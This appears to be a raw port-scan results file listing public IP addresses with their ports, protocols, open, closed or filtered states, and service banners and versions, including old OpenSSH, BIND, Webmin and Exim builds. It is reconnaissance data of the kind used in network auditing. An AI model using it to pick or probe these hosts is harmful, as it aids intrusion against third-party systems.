505554.85.59.109 53 udp domain unknown
505654.85.59.109 67 tcp dhcps filtered
505754.85.59.109 67 udp dhcps unknown
505854.85.59.109 68 tcp dhcpc filtered
505954.85.59.109 68 udp dhcpc unknown
506054.85.59.109 69 tcp tftp filtered
506154.85.59.109 69 udp tftp unknown
506254.85.59.109 80 tcp http open nginx
506354.85.59.109 88 tcp kerberos-sec filtered
506454.85.59.109 88 udp kerberos-sec unknown
506554.85.59.109 123 tcp ntp filtered
506654.85.59.109 123 udp ntp unknown
506754.85.59.109 137 tcp netbios-ns filtered
506854.85.59.109 137 udp netbios-ns unknown
506954.85.59.109 138 tcp netbios-dgm filtered
507054.85.59.109 138 udp netbios-dgm unknown
507154.85.59.109 139 tcp netbios-ssn filtered
507254.85.59.109 139 udp netbios-ssn unknown
507354.85.59.109 161 tcp snmp filtered
507454.85.59.109 161 udp snmp unknown
507554.85.59.109 162 tcp snmptrap filtered
507654.85.59.109 162 udp snmptrap unknown
507754.85.59.109 389 tcp ldap filtered
507854.85.59.109 389 udp ldap unknown
507954.85.59.109 443 tcp ssl/http open nginx
508054.85.59.109 520 tcp efs filtered
508154.85.59.109 520 udp route unknown
508254.85.59.109 2049 tcp nfs filtered
508354.85.59.109 2049 udp nfs unknown
508464.69.94.253 53 tcp domain filtered
508564.69.94.253 53 udp domain unknown
508664.69.94.253 67 tcp dhcps filtered
508764.69.94.253 67 udp dhcps unknown
508864.69.94.253 68 tcp dhcpc filtered
508964.69.94.253 68 udp dhcpc unknown
509064.69.94.253 69 tcp tftp filtered
509164.69.94.253 69 udp tftp unknown
509264.69.94.253 88 tcp kerberos-sec filtered
509364.69.94.253 88 udp kerberos-sec unknown
509464.69.94.253 123 tcp ntp filtered
509564.69.94.253 123 udp ntp unknown
509664.69.94.253 137 tcp netbios-ns filtered
509764.69.94.253 137 udp netbios-ns unknown
509864.69.94.253 138 tcp netbios-dgm filtered
509964.69.94.253 138 udp netbios-dgm unknown
510064.69.94.253 139 tcp netbios-ssn filtered
510164.69.94.253 139 udp netbios-ssn unknown
510264.69.94.253 161 tcp snmp filtered
510364.69.94.253 161 udp snmp unknown
510464.69.94.253 162 tcp snmptrap filtered
510564.69.94.253 162 udp snmptrap unknown
510664.69.94.253 389 tcp ldap filtered
510764.69.94.253 389 udp ldap unknown
510864.69.94.253 520 tcp efs filtered
510964.69.94.253 520 udp route unknown
511064.69.94.253 2049 tcp nfs filtered
511164.69.94.253 2049 udp nfs unknown
511269.163.233.4 21 tcp ftp open 220 DreamHost FTP Server\x0d\x0a
511369.163.233.4 22 tcp ssh open SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13
511469.163.233.4 25 tcp open
511569.163.233.4 53 tcp domain closed
511669.163.233.4 53 udp domain unknown
511769.163.233.4 67 tcp dhcps closed
511869.163.233.4 67 udp dhcps closed
511969.163.233.4 68 tcp dhcpc closed
512069.163.233.4 68 udp dhcpc unknown
512169.163.233.4 69 tcp tftp closed
512269.163.233.4 69 udp tftp closed
512369.163.233.4 88 tcp kerberos-sec closed
512469.163.233.4 88 udp kerberos-sec unknown
512569.163.233.4 123 tcp ntp closed
512669.163.233.4 123 udp ntp unknown
512769.163.233.4 137 tcp netbios-ns closed
512869.163.233.4 137 udp netbios-ns closed
512969.163.233.4 138 tcp netbios-dgm closed
513069.163.233.4 138 udp netbios-dgm closed
513169.163.233.4 139 tcp netbios-ssn closed
513269.163.233.4 139 udp netbios-ssn unknown
513369.163.233.4 161 tcp snmp closed
513469.163.233.4 161 udp snmp closed
513569.163.233.4 162 tcp snmptrap closed
513669.163.233.4 162 udp snmptrap closed
513769.163.233.4 389 tcp ldap closed
513869.163.233.4 389 udp ldap unknown
513969.163.233.4 520 tcp efs closed
514069.163.233.4 520 udp route closed
514169.163.233.4 2049 tcp nfs closed
514269.163.233.4 2049 udp nfs unknown
514374.117.180.192 21 tcp ftp filtered 220 Hello.\x0d\x0a
514474.117.180.192 22 tcp ssh filtered
514574.117.180.192 25 tcp smtp filtered
514674.117.180.192 53 tcp domain closed
514774.117.180.192 53 udp domain unknown
514874.117.180.192 67 tcp dhcps closed
514974.117.180.192 67 udp dhcps unknown
515074.117.180.192 68 tcp dhcpc closed
515174.117.180.192 68 udp dhcpc closed
515274.117.180.192 69 tcp tftp closed
515374.117.180.192 69 udp tftp closed
515474.117.180.192 80 tcp http filtered
515574.117.180.192 88 tcp kerberos-sec closed
515674.117.180.192 88 udp kerberos-sec closed
515774.117.180.192 110 tcp pop3 filtered
515874.117.180.192 111 tcp rpcbind filtered
515974.117.180.192 123 tcp ntp closed
516074.117.180.192 123 udp ntp unknown
516174.117.180.192 137 tcp netbios-ns closed
516274.117.180.192 137 udp netbios-ns closed
516374.117.180.192 138 tcp netbios-dgm closed
516474.117.180.192 138 udp netbios-dgm unknown
516574.117.180.192 139 tcp netbios-ssn closed
516674.117.180.192 139 udp netbios-ssn unknown
516774.117.180.192 143 tcp imap filtered
516874.117.180.192 161 tcp snmp closed
516974.117.180.192 161 udp snmp closed
517074.117.180.192 162 tcp snmptrap closed
517174.117.180.192 162 udp snmptrap unknown
517274.117.180.192 323 tcp rpki-rtr filtered
517374.117.180.192 389 tcp ldap closed
517474.117.180.192 389 udp ldap closed
517574.117.180.192 443 tcp https filtered
517674.117.180.192 465 tcp ssl/smtp open Exim smtpd 4.92.3
517774.117.180.192 520 tcp efs closed
517874.117.180.192 520 udp route unknown
517974.117.180.192 587 tcp submission filtered
518074.117.180.192 873 tcp rsync filtered
518174.117.180.192 993 tcp imaps filtered
518274.117.180.192 995 tcp pop3s filtered
518374.117.180.192 2049 tcp nfs closed
518474.117.180.192 2049 udp nfs closed
518574.117.180.192 2525 tcp smtp open Exim smtpd
518674.117.180.192 3306 tcp mysql filtered
518774.117.180.192 4949 tcp tcpwrapped open
518874.117.180.192 5666 tcp tcpwrapped open
518974.117.180.192 6380 tcp filtered
519074.117.180.192 9306 tcp sphinx-search open Sphinx Search daemon 2.1.5-id64-release
519174.117.180.192 11211 tcp memcache filtered
519282.94.222.131 53 udp domain unknown
519382.94.222.131 67 udp dhcps unknown
519482.94.222.131 68 udp dhcpc unknown
519582.94.222.131 69 udp tftp unknown
519682.94.222.131 88 udp kerberos-sec unknown
519782.94.222.131 123 udp ntp unknown
519882.94.222.131 137 udp netbios-ns unknown
519982.94.222.131 138 udp netbios-dgm unknown
520082.94.222.131 139 udp netbios-ssn unknown
520182.94.222.131 161 udp snmp unknown
520282.94.222.131 162 udp snmptrap unknown
520382.94.222.131 389 udp ldap unknown
520482.94.222.131 520 udp route unknown
520582.94.222.131 2049 udp nfs unknown
520692.123.250.35 53 tcp domain closed
520792.123.250.35 53 udp domain closed
520892.123.250.35 67 tcp dhcps filtered
520992.123.250.35 67 udp dhcps unknown
521092.123.250.35 68 tcp dhcpc filtered
521192.123.250.35 68 udp dhcpc unknown
521292.123.250.35 69 tcp tftp filtered
521392.123.250.35 69 udp tftp unknown
521492.123.250.35 80 tcp http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
521592.123.250.35 88 tcp kerberos-sec filtered
521692.123.250.35 88 udp kerberos-sec unknown
521792.123.250.35 123 tcp ntp filtered
521892.123.250.35 123 udp ntp unknown
521992.123.250.35 137 tcp netbios-ns filtered
522092.123.250.35 137 udp netbios-ns unknown
522192.123.250.35 138 tcp netbios-dgm filtered
522292.123.250.35 138 udp netbios-dgm unknown
522392.123.250.35 139 tcp netbios-ssn filtered
522492.123.250.35 139 udp netbios-ssn unknown
522592.123.250.35 161 tcp snmp filtered
522692.123.250.35 161 udp snmp unknown
522792.123.250.35 162 tcp snmptrap filtered
522892.123.250.35 162 udp snmptrap unknown
522992.123.250.35 389 tcp ldap filtered
523092.123.250.35 389 udp ldap unknown
523192.123.250.35 443 tcp ssl/https open
523292.123.250.35 520 tcp efs filtered
523392.123.250.35 520 udp route unknown
523492.123.250.35 2049 tcp nfs filtered
523592.123.250.35 2049 udp nfs unknown
523692.123.250.35 8883 tcp secure-mqtt open
523792.123.250.65 53 tcp domain filtered
523892.123.250.65 53 udp domain unknown
523992.123.250.65 67 tcp dhcps filtered
524092.123.250.65 67 udp dhcps unknown
524192.123.250.65 68 tcp dhcpc filtered
524292.123.250.65 68 udp dhcpc unknown
524392.123.250.65 69 tcp tftp filtered
524492.123.250.65 69 udp tftp unknown
524592.123.250.65 80 tcp http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
524692.123.250.65 88 tcp kerberos-sec filtered
524792.123.250.65 88 udp kerberos-sec unknown
524892.123.250.65 123 tcp ntp filtered
524992.123.250.65 123 udp ntp unknown
525092.123.250.65 137 tcp netbios-ns filtered
525192.123.250.65 137 udp netbios-ns unknown
525292.123.250.65 138 tcp netbios-dgm filtered
525392.123.250.65 138 udp netbios-dgm unknown
525492.123.250.65 139 tcp netbios-ssn filtered
525592.123.250.65 139 udp netbios-ssn unknown
525692.123.250.65 161 tcp snmp filtered
525792.123.250.65 161 udp snmp unknown
525892.123.250.65 162 tcp snmptrap filtered
525992.123.250.65 162 udp snmptrap unknown
526092.123.250.65 389 tcp ldap filtered
526192.123.250.65 389 udp ldap unknown
526292.123.250.65 443 tcp ssl/https open
526392.123.250.65 520 tcp efs filtered
526492.123.250.65 520 udp route unknown
526592.123.250.65 2049 tcp nfs filtered
526692.123.250.65 2049 udp nfs unknown
526792.123.250.65 8883 tcp secure-mqtt open
5268104.244.73.40 53 udp domain unknown
5269104.244.73.40 67 udp dhcps unknown
5270104.244.73.40 68 udp dhcpc unknown
5271104.244.73.40 69 udp tftp unknown
5272104.244.73.40 88 udp kerberos-sec unknown
5273104.244.73.40 123 udp ntp unknown
5274104.244.73.40 137 udp netbios-ns unknown
5275104.244.73.40 138 udp netbios-dgm unknown
5276104.244.73.40 139 udp netbios-ssn unknown
5277104.244.73.40 161 udp snmp unknown
5278104.244.73.40 162 udp snmptrap unknown
5279104.244.73.40 389 udp ldap unknown
5280104.244.73.40 520 udp route unknown
5281104.244.73.40 2049 udp nfs unknown
5282104.244.76.231 53 tcp domain filtered
5283104.244.76.231 53 udp domain unknown
5284104.244.76.231 67 tcp dhcps filtered
5285104.244.76.231 67 udp dhcps unknown
5286104.244.76.231 68 tcp dhcpc filtered
5287104.244.76.231 68 udp dhcpc unknown
5288104.244.76.231 69 tcp tftp filtered
5289104.244.76.231 69 udp tftp unknown
5290104.244.76.231 80 tcp http open nginx
5291104.244.76.231 88 tcp kerberos-sec filtered
5292104.244.76.231 88 udp kerberos-sec unknown
5293104.244.76.231 123 tcp ntp filtered
5294104.244.76.231 123 udp ntp unknown
5295104.244.76.231 137 tcp netbios-ns filtered
5296104.244.76.231 137 udp netbios-ns unknown
5297104.244.76.231 138 tcp netbios-dgm filtered
5298104.244.76.231 138 udp netbios-dgm unknown
5299104.244.76.231 139 tcp netbios-ssn filtered
5300104.244.76.231 139 udp netbios-ssn unknown
5301104.244.76.231 161 tcp snmp filtered
5302104.244.76.231 161 udp snmp unknown
5303104.244.76.231 162 tcp snmptrap filtered
5304104.244.76.231 162 udp snmptrap unknown
5305104.244.76.231 389 tcp ldap filtered
5306104.244.76.231 389 udp ldap unknown
5307104.244.76.231 443 tcp ssl/http open nginx
5308104.244.76.231 520 tcp efs filtered
5309104.244.76.231 520 udp route unknown
5310104.244.76.231 2049 tcp nfs filtered
5311104.244.76.231 2049 udp nfs unknown
5312104.244.76.231 5040 tcp unknown closed
5313104.244.76.231 16001 tcp ssl/http open MiniServ 1.910 Webmin httpd
5314104.244.76.231 16221 tcp closed
5315104.244.76.231 23022 tcp closed
5316104.244.76.231 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
5317104.244.77.188 53 tcp domain filtered
5318104.244.77.188 53 udp domain unknown
5319104.244.77.188 67 tcp dhcps filtered
5320104.244.77.188 67 udp dhcps unknown
5321104.244.77.188 68 tcp dhcpc filtered
5322104.244.77.188 68 udp dhcpc unknown
5323104.244.77.188 69 tcp tftp filtered
5324104.244.77.188 69 udp tftp unknown
5325104.244.77.188 80 tcp http open nginx
5326104.244.77.188 88 tcp kerberos-sec filtered
5327104.244.77.188 88 udp kerberos-sec unknown
5328104.244.77.188 123 tcp ntp filtered
5329104.244.77.188 123 udp ntp unknown
5330104.244.77.188 137 tcp netbios-ns filtered
5331104.244.77.188 137 udp netbios-ns unknown
5332104.244.77.188 138 tcp netbios-dgm filtered
5333104.244.77.188 138 udp netbios-dgm unknown
5334104.244.77.188 139 tcp netbios-ssn filtered
5335104.244.77.188 139 udp netbios-ssn unknown
5336104.244.77.188 161 tcp snmp filtered
5337104.244.77.188 161 udp snmp unknown
5338104.244.77.188 162 tcp snmptrap filtered
5339104.244.77.188 162 udp snmptrap unknown
5340104.244.77.188 389 tcp ldap filtered
5341104.244.77.188 389 udp ldap unknown
5342104.244.77.188 443 tcp ssl/http open nginx
5343104.244.77.188 520 tcp efs filtered
5344104.244.77.188 520 udp route unknown
5345104.244.77.188 2049 tcp nfs filtered
5346104.244.77.188 2049 udp nfs unknown
5347104.244.77.188 5040 tcp unknown closed
5348104.244.77.188 16001 tcp ssl/http open MiniServ 1.910 Webmin httpd
5349104.244.77.188 16221 tcp closed
5350104.244.77.188 23022 tcp closed
5351104.244.77.188 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
5352104.244.79.89 53 tcp domain filtered
5353104.244.79.89 53 udp domain unknown
5354104.244.79.89 67 tcp dhcps filtered
5355104.244.79.89 67 udp dhcps unknown
5356104.244.79.89 68 tcp dhcpc filtered
5357104.244.79.89 68 udp dhcpc unknown
5358104.244.79.89 69 tcp tftp filtered
5359104.244.79.89 69 udp tftp unknown
5360104.244.79.89 80 tcp http open nginx
5361104.244.79.89 88 tcp kerberos-sec filtered
5362104.244.79.89 88 udp kerberos-sec unknown
5363104.244.79.89 123 tcp ntp filtered
5364104.244.79.89 123 udp ntp unknown
5365104.244.79.89 137 tcp netbios-ns filtered
5366104.244.79.89 137 udp netbios-ns unknown
5367104.244.79.89 138 tcp netbios-dgm filtered
5368104.244.79.89 138 udp netbios-dgm unknown
5369104.244.79.89 139 tcp netbios-ssn filtered
5370104.244.79.89 139 udp netbios-ssn unknown
5371104.244.79.89 161 tcp snmp filtered
5372104.244.79.89 161 udp snmp unknown
5373104.244.79.89 162 tcp snmptrap filtered
5374104.244.79.89 162 udp snmptrap unknown
5375104.244.79.89 389 tcp ldap filtered
5376104.244.79.89 389 udp ldap unknown
5377104.244.79.89 443 tcp ssl/http open nginx
5378104.244.79.89 520 tcp efs filtered
5379104.244.79.89 520 udp route unknown
5380104.244.79.89 2049 tcp nfs filtered
5381104.244.79.89 2049 udp nfs unknown
5382104.244.79.89 7910 tcp ssl/http open nginx
5383104.244.79.89 7920 tcp unknown closed
5384104.244.79.89 7930 tcp closed
5385104.244.79.89 16001 tcp http open MiniServ 1.930 Webmin httpd
5386104.244.79.89 16010 tcp ssl/http open nginx
5387104.244.79.89 16221 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
5388104.244.79.89 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
5389111.90.145.39 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 15:04. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
5390111.90.145.39 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
5391111.90.145.39 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
5392111.90.145.39 67 tcp dhcps closed
5393111.90.145.39 67 udp dhcps closed
5394111.90.145.39 68 tcp dhcpc closed
5395111.90.145.39 68 udp dhcpc unknown
5396111.90.145.39 69 tcp tftp closed
5397111.90.145.39 69 udp tftp unknown
5398111.90.145.39 88 tcp kerberos-sec closed
5399111.90.145.39 88 udp kerberos-sec unknown
5400111.90.145.39 123 tcp ntp closed
5401111.90.145.39 123 udp ntp closed
5402111.90.145.39 137 tcp netbios-ns closed
5403111.90.145.39 137 udp netbios-ns unknown
5404111.90.145.39 138 tcp netbios-dgm closed
5405111.90.145.39 138 udp netbios-dgm unknown
5406111.90.145.39 139 tcp netbios-ssn filtered
5407111.90.145.39 139 udp netbios-ssn closed
5408111.90.145.39 161 tcp snmp closed
5409111.90.145.39 161 udp snmp unknown
5410111.90.145.39 162 tcp snmptrap closed
5411111.90.145.39 162 udp snmptrap closed
5412111.90.145.39 389 tcp ldap closed
5413111.90.145.39 389 udp ldap unknown
5414111.90.145.39 520 tcp efs closed
5415111.90.145.39 520 udp route closed
5416111.90.145.39 2049 tcp nfs closed
5417111.90.145.39 2049 udp nfs closed
5418143.95.110.248 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 150 allowed.\x0d\x0a220-Local time is now 05:55. Server port: 21.\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
5419143.95.110.248 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
5420143.95.110.248 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
5421143.95.110.248 67 tcp dhcps closed
5422143.95.110.248 67 udp dhcps unknown
5423143.95.110.248 68 tcp dhcpc closed
5424143.95.110.248 68 udp dhcpc unknown
5425143.95.110.248 69 tcp tftp closed
5426143.95.110.248 69 udp tftp unknown
5427143.95.110.248 88 tcp kerberos-sec closed
5428143.95.110.248 88 udp kerberos-sec unknown
5429143.95.110.248 123 tcp ntp closed
5430143.95.110.248 123 udp ntp unknown
5431143.95.110.248 137 tcp netbios-ns closed
5432143.95.110.248 137 udp netbios-ns unknown
5433143.95.110.248 138 tcp netbios-dgm closed
5434143.95.110.248 138 udp netbios-dgm closed
5435143.95.110.248 139 tcp netbios-ssn closed
5436143.95.110.248 139 udp netbios-ssn unknown
5437143.95.110.248 161 tcp snmp closed
5438143.95.110.248 161 udp snmp closed
5439143.95.110.248 162 tcp snmptrap closed
5440143.95.110.248 162 udp snmptrap unknown
5441143.95.110.248 389 tcp ldap closed
5442143.95.110.248 389 udp ldap closed
5443143.95.110.248 520 tcp efs closed
5444143.95.110.248 520 udp route unknown
5445143.95.110.248 2049 tcp nfs closed
5446143.95.110.248 2049 udp nfs unknown
5447149.126.72.220 25 tcp smtp closed
5448149.126.72.220 51 tcp tcpwrapped open
5449149.126.72.220 53 tcp domain open
5450149.126.72.220 53 udp domain open
5451149.126.72.220 65 tcp tcpwrapped open
5452149.126.72.220 66 tcp tcpwrapped open
5453149.126.72.220 67 tcp dhcps filtered
5454149.126.72.220 67 udp dhcps unknown
5455149.126.72.220 68 tcp dhcpc filtered
5456149.126.72.220 68 udp dhcpc unknown
5457149.126.72.220 69 tcp tftp filtered
5458149.126.72.220 69 udp tftp unknown
5459149.126.72.220 80 tcp tcpwrapped open
5460149.126.72.220 81 tcp tcpwrapped open
5461149.126.72.220 82 tcp tcpwrapped open
5462149.126.72.220 83 tcp tcpwrapped open
5463149.126.72.220 84 tcp tcpwrapped open
5464149.126.72.220 85 tcp tcpwrapped open
5465149.126.72.220 86 tcp tcpwrapped open
5466149.126.72.220 88 tcp http open Incapsula CDN httpd
5467149.126.72.220 88 udp kerberos-sec unknown
5468149.126.72.220 89 tcp tcpwrapped open
5469149.126.72.220 90 tcp tcpwrapped open
5470149.126.72.220 91 tcp tcpwrapped open
5471149.126.72.220 92 tcp tcpwrapped open
5472149.126.72.220 98 tcp tcpwrapped open
5473149.126.72.220 99 tcp tcpwrapped open
5474149.126.72.220 123 tcp ntp filtered
5475149.126.72.220 123 udp ntp unknown
5476149.126.72.220 137 tcp netbios-ns filtered
5477149.126.72.220 137 udp netbios-ns filtered
5478149.126.72.220 138 tcp netbios-dgm filtered
5479149.126.72.220 138 udp netbios-dgm filtered
5480149.126.72.220 139 tcp netbios-ssn closed
5481149.126.72.220 139 udp netbios-ssn unknown
5482149.126.72.220 160 tcp sgmp-traps closed
5483149.126.72.220 161 tcp snmp filtered
5484149.126.72.220 161 udp snmp unknown
5485149.126.72.220 162 tcp snmptrap filtered
5486149.126.72.220 162 udp snmptrap unknown
5487149.126.72.220 189 tcp tcpwrapped open
5488149.126.72.220 190 tcp tcpwrapped open
5489149.126.72.220 192 tcp tcpwrapped open
5490149.126.72.220 243 tcp tcpwrapped open
5491149.126.72.220 285 tcp tcpwrapped open
5492149.126.72.220 314 tcp tcpwrapped open
5493149.126.72.220 343 tcp tcpwrapped open
5494149.126.72.220 347 tcp tcpwrapped open
5495149.126.72.220 385 tcp tcpwrapped open
5496149.126.72.220 389 tcp ssl/http open Incapsula CDN httpd
5497149.126.72.220 389 udp ldap unknown
5498149.126.72.220 400 tcp tcpwrapped open
5499149.126.72.220 440 tcp tcpwrapped open
5500149.126.72.220 441 tcp tcpwrapped open
5501149.126.72.220 442 tcp tcpwrapped open
5502149.126.72.220 443 tcp ssl/tcpwrapped open
5503149.126.72.220 444 tcp tcpwrapped open
5504149.126.72.220 445 tcp microsoft-ds closed
5505149.126.72.220 446 tcp tcpwrapped open
5506149.126.72.220 447 tcp tcpwrapped open
5507149.126.72.220 448 tcp tcpwrapped open
5508149.126.72.220 449 tcp tcpwrapped open
5509149.126.72.220 452 tcp tcpwrapped open
5510149.126.72.220 461 tcp tcpwrapped open
5511149.126.72.220 462 tcp tcpwrapped open
5512149.126.72.220 480 tcp tcpwrapped open
5513149.126.72.220 485 tcp tcpwrapped open
5514149.126.72.220 487 tcp tcpwrapped open
5515149.126.72.220 488 tcp tcpwrapped open
5516149.126.72.220 491 tcp tcpwrapped open
5517149.126.72.220 520 tcp efs filtered
5518149.126.72.220 520 udp route unknown
5519149.126.72.220 555 tcp tcpwrapped open
5520149.126.72.220 556 tcp tcpwrapped open
5521149.126.72.220 587 tcp tcpwrapped open
5522149.126.72.220 631 tcp tcpwrapped open
5523149.126.72.220 632 tcp tcpwrapped open
5524149.126.72.220 636 tcp tcpwrapped open
5525149.126.72.220 743 tcp tcpwrapped open
5526149.126.72.220 772 tcp tcpwrapped open
5527149.126.72.220 777 tcp tcpwrapped open
5528149.126.72.220 782 tcp tcpwrapped open
5529149.126.72.220 785 tcp tcpwrapped open
5530149.126.72.220 800 tcp tcpwrapped open
5531149.126.72.220 801 tcp tcpwrapped open
5532149.126.72.220 805 tcp tcpwrapped open
5533149.126.72.220 806 tcp tcpwrapped open
5534149.126.72.220 809 tcp tcpwrapped open
5535149.126.72.220 843 tcp tcpwrapped open
5536149.126.72.220 853 tcp tcpwrapped open
5537149.126.72.220 885 tcp tcpwrapped open
5538149.126.72.220 886 tcp tcpwrapped open
5539149.126.72.220 887 tcp tcpwrapped open
5540149.126.72.220 888 tcp tcpwrapped open
5541149.126.72.220 943 tcp tcpwrapped open
5542149.126.72.220 947 tcp tcpwrapped open
5543149.126.72.220 953 tcp tcpwrapped open
5544149.126.72.220 990 tcp tcpwrapped open
5545149.126.72.220 995 tcp tcpwrapped open
5546149.126.72.220 998 tcp tcpwrapped open
5547149.126.72.220 999 tcp tcpwrapped open
5548149.126.72.220 1000 tcp tcpwrapped open
5549149.126.72.220 1002 tcp tcpwrapped open
5550149.126.72.220 1024 tcp tcpwrapped open
5551149.126.72.220 1025 tcp tcpwrapped open
5552149.126.72.220 1028 tcp tcpwrapped open
5553149.126.72.220 1080 tcp tcpwrapped open
5554149.126.72.220 1103 tcp tcpwrapped open
5555149.126.72.220 1111 tcp tcpwrapped open
5556149.126.72.220 1180 tcp tcpwrapped open
5557149.126.72.220 1181 tcp tcpwrapped open
5558149.126.72.220 1207 tcp tcpwrapped open
5559149.126.72.220 1234 tcp tcpwrapped open
5560149.126.72.220 1250 tcp tcpwrapped open
5561149.126.72.220 1283 tcp tcpwrapped open
5562149.126.72.220 1291 tcp tcpwrapped open
5563149.126.72.220 1292 tcp tcpwrapped open
5564149.126.72.220 1293 tcp tcpwrapped open
5565149.126.72.220 1337 tcp tcpwrapped open
5566149.126.72.220 1344 tcp tcpwrapped open
5567149.126.72.220 1355 tcp tcpwrapped open
5568149.126.72.220 1364 tcp tcpwrapped open
5569149.126.72.220 1366 tcp tcpwrapped open
5570149.126.72.220 1377 tcp tcpwrapped open
5571149.126.72.220 1387 tcp tcpwrapped open
5572149.126.72.220 1388 tcp tcpwrapped open
5573149.126.72.220 1433 tcp tcpwrapped open
5574149.126.72.220 1443 tcp tcpwrapped open
5575149.126.72.220 1447 tcp tcpwrapped open
5576149.126.72.220 1450 tcp tcpwrapped open
5577149.126.72.220 1451 tcp tcpwrapped open
5578149.126.72.220 1452 tcp tcpwrapped open
5579149.126.72.220 1453 tcp tcpwrapped open
5580149.126.72.220 1454 tcp tcpwrapped open
5581149.126.72.220 1455 tcp tcpwrapped open
5582149.126.72.220 1456 tcp tcpwrapped open
5583149.126.72.220 1457 tcp tcpwrapped open
5584149.126.72.220 1458 tcp tcpwrapped open
5585149.126.72.220 1459 tcp tcpwrapped open
5586149.126.72.220 1460 tcp tcpwrapped open
5587149.126.72.220 1494 tcp tcpwrapped open
5588149.126.72.220 1935 tcp tcpwrapped open
5589149.126.72.220 1950 tcp tcpwrapped open
5590149.126.72.220 1951 tcp tcpwrapped open
5591149.126.72.220 1952 tcp tcpwrapped open
5592149.126.72.220 1953 tcp tcpwrapped open
5593149.126.72.220 1954 tcp tcpwrapped open
5594149.126.72.220 1955 tcp tcpwrapped open
5595149.126.72.220 1956 tcp tcpwrapped open
5596149.126.72.220 1957 tcp tcpwrapped open
5597149.126.72.220 1958 tcp tcpwrapped open
5598149.126.72.220 1959 tcp tcpwrapped open
5599149.126.72.220 1960 tcp tcpwrapped open
5600149.126.72.220 1964 tcp tcpwrapped open
5601149.126.72.220 1965 tcp tcpwrapped open
5602149.126.72.220 1966 tcp tcpwrapped open
5603149.126.72.220 1967 tcp tcpwrapped open
5604149.126.72.220 1968 tcp tcpwrapped open
5605149.126.72.220 1969 tcp tcpwrapped open
5606149.126.72.220 1970 tcp tcpwrapped open
5607149.126.72.220 1971 tcp tcpwrapped open
5608149.126.72.220 1972 tcp tcpwrapped open
5609149.126.72.220 1973 tcp tcpwrapped open
5610149.126.72.220 1974 tcp tcpwrapped open
5611149.126.72.220 1975 tcp tcpwrapped open
5612149.126.72.220 1976 tcp tcpwrapped open
5613149.126.72.220 1977 tcp tcpwrapped open
5614149.126.72.220 1978 tcp tcpwrapped open
5615149.126.72.220 1979 tcp tcpwrapped open
5616149.126.72.220 1980 tcp tcpwrapped open
5617149.126.72.220 1981 tcp tcpwrapped open
5618149.126.72.220 1982 tcp tcpwrapped open
5619149.126.72.220 1983 tcp tcpwrapped open
5620149.126.72.220 1984 tcp tcpwrapped open
5621149.126.72.220 1985 tcp tcpwrapped open
5622149.126.72.220 1986 tcp tcpwrapped open
5623149.126.72.220 1987 tcp tcpwrapped open
5624149.126.72.220 1988 tcp tcpwrapped open
5625149.126.72.220 1989 tcp tcpwrapped open
5626149.126.72.220 2000 tcp tcpwrapped open
5627149.126.72.220 2001 tcp tcpwrapped open
5628149.126.72.220 2006 tcp tcpwrapped open
5629149.126.72.220 2012 tcp tcpwrapped open
5630149.126.72.220 2020 tcp tcpwrapped open
5631149.126.72.220 2048 tcp tcpwrapped open
5632149.126.72.220 2049 tcp http open Incapsula CDN httpd
5633149.126.72.220 2049 udp nfs unknown
5634149.126.72.220 2050 tcp tcpwrapped open
5635149.126.72.220 2051 tcp tcpwrapped open
5636149.126.72.220 2052 tcp tcpwrapped open
5637149.126.72.220 2053 tcp tcpwrapped open
5638149.126.72.220 2054 tcp tcpwrapped open
5639149.126.72.220 2055 tcp tcpwrapped open
5640149.126.72.220 2056 tcp tcpwrapped open
5641149.126.72.220 2057 tcp tcpwrapped open
5642149.126.72.220 2058 tcp tcpwrapped open
5643149.126.72.220 2059 tcp tcpwrapped open
5644149.126.72.220 2060 tcp tcpwrapped open
5645149.126.72.220 2061 tcp tcpwrapped open
5646149.126.72.220 2062 tcp tcpwrapped open
5647149.126.72.220 2063 tcp tcpwrapped open
5648149.126.72.220 2064 tcp tcpwrapped open
5649149.126.72.220 2065 tcp tcpwrapped open
5650149.126.72.220 2066 tcp tcpwrapped open
5651149.126.72.220 2067 tcp tcpwrapped open
5652149.126.72.220 2068 tcp tcpwrapped open
5653149.126.72.220 2069 tcp tcpwrapped open
5654149.126.72.220 2070 tcp tcpwrapped open
5655149.126.72.220 2072 tcp tcpwrapped open
5656149.126.72.220 2082 tcp tcpwrapped open
5657149.126.72.220 2083 tcp tcpwrapped open
5658149.126.72.220 2087 tcp tcpwrapped open
5659149.126.72.220 2096 tcp tcpwrapped open
5660149.126.72.220 2100 tcp tcpwrapped open
5661149.126.72.220 2108 tcp tcpwrapped open
5662149.126.72.220 2200 tcp tcpwrapped open
5663149.126.72.220 2209 tcp tcpwrapped open
5664149.126.72.220 2222 tcp tcpwrapped open
5665149.126.72.220 2226 tcp tcpwrapped open
5666149.126.72.220 2248 tcp tcpwrapped open
5667149.126.72.220 2344 tcp tcpwrapped open
5668149.126.72.220 2345 tcp tcpwrapped open
5669149.126.72.220 2353 tcp tcpwrapped open
5670149.126.72.220 2363 tcp tcpwrapped open
5671149.126.72.220 2423 tcp tcpwrapped open
5672149.126.72.220 2433 tcp tcpwrapped open
5673149.126.72.220 2435 tcp tcpwrapped open
